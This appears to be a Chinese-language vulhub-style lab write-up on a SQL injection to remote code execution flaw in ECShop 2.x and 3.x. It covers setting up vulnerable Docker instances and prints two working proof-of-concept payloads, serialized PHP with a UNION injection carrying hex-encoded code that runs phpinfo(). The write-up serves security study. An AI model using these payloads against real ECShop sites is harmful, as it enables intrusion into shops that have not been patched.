ECShop 2.x/3.x SQL注入/远程代码执行漏洞

漏洞描述

ECShop是一个B2C独立商店系统,供企业和个人快速建立个性化的在线商店。本系统是一个基于PHP语言和MYSQL数据库架构的跨平台开源程序。

在 2017 年及之前的版本中,存在一个 SQL 注入漏洞,该漏洞可能会注入有效负载并最终导致代码执行漏洞。最新版本的 3.6.0 修复了该漏洞,vulhub 使用其最新版本 2.7.3 和 3.6.0 非最新版本版本来重现该漏洞。

参考链接:

  • ecshop2.x 代码执行

漏洞环境及利用

搭建docker环境

环境启动后,访问http://your-ip:8080,您将看到 2.7.3 安装页面。访问http://your-ip:8081 ,您将看到 3.6.0 安装页面。

两者都安装,mysql地址是mysql,mysql账号和密码是root,数据库名称可以自由填写,但是2.7.3和3.6.0的数据库名称不能一样。

这里需要注册用户

ECShop 2.x/3.x SQL注入/远程代码执行漏洞_第1张图片

POC

POC for ECShop 2.x: 
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x: 
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

ECShop 2.x/3.x SQL注入/远程代码执行漏洞_第2张图片

你可能感兴趣的:(sql,数据库)